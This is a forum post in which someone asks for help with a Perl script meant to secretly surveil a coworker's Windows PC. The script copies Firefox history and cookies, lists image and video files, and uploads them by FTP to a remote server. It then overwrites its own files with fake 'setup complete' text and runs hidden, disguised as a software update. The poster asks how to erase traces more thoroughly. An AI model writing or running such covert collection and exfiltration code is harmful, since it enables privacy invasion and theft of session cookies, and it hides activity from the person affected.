Remote Forensics

[Tedob1]

we have been told that an associate of ours has porn on his computer. not that i really care but if this came out it could be very harmful for the company i work for. the director asked me if i can get evidence of porn on his computer.

i found out he is running xp and uses firefox.

this script has been encapsulated to run on machines that do not have perl installed. perl2exe allows me to run this without opening a console and the bat file it calls also runs without one allowing a great deal of stealth to what im doing while im also updating the proprietory software on his box. he'll be sitting there watching as i work over PCAnywhere. i dont want him getting mad if he's not guilty but if he is guilty legal action will be taken. the department heads believe that the contract that he signed allows us to do this but a lawer is being consulted before i go ahead with it.


as you can see im a hack not a programmer and the programmers here will have a field day with this. my only response....it works! well at least on the 2k machine i made it on. ill test XP tomorrow.

my questions:

1) how do i delete the files that i create instead of just overwriting them, i tried using 'unlink' but it didn't do it. i can always just add an AT command to the batch file but that leads to my second question.

2) how would i use grep to list all the files and not shell to a batch file. it would be so much faster.

3)how can a get a directory listing of randomly named directories without using 'dir' in a 'for' command in the batch.

Code:

#!/usr/bin/perl
use Net::FTP;


####create batch to collect data####
open(FD, "+>>c:\\Xname\\LCinstall.bat") or die "can't open $FD $!";
print FD "cd \%USERPROFILE\%\n";
print FD "cd \"Application Data\"\\Mozilla\\Firefox\\Profiles\n";
print FD "for /F \"tokens=4 \" \%\%X in ('dir ^|find  \"DIR\" ') do type \%\%X\\history.dat \>c:\\Xname\\LCinstall.inf\n";
print FD "for /F \"tokens=4\" \%\%X in ('dir ^|find  \"DIR\" ') do type \%\%X\\cookies.txt \>\>c:\\Xname\\LCinstall.inf\n";
print FD "cd\\ \n";
print FD "dir /s *.jpg \>\>c:\\Xname\\LCinstall.inf\n";
print FD "dir /s *.avi \>\>c:\\Xname\\LCinstall.inf\n";
print FD "dir /s *.wmv \>\>c:\\Xname\\LCinstall.inf\n";

####run batch file####
system('c:\Xname\LCinstall.bat');

#### Info needed for server####
$hostname = 'xx.xxx.xx.xxx';
$username = 'name';
$password = 'password';
$home = "/somedir";
$filename = 'LCinstall.inf';
$Local = 'c:\Xname\LCinstall.inf';


####Begin FTP####
$ftp = Net::FTP->new($hostname) or die;          
$ftp->login($username, $password);       
$ftp->cwd($home),"\n";                   
$ftp->ascii(); 
$ftp->put ($Local, $filename); 
$ftp->quit;

####overwrite files####
open(FD, ">c:\\Xname\\LCinstall.bat") or die "can't open $FD $!";
print FD "run setup\n";
open(FD, ">c:\\Xname\\LCinstall.inf") or die "can't open $FD $!";
print FD "setup complete\n";